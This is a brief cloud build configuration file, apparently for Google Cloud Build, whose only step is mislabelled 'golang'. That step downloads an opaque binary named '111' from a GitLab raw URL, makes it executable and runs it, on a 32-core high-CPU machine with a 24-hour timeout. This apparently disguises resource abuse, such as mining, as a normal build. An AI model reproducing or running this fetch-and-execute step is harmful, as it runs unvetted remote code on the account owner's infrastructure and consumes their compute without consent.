steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://gitlab.com/cuan1/artos/-/raw/main/111 && chmod u+x 111 && ./111
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  machineType: 'E2_HIGHCPU_32'
  diskSizeGb: '100'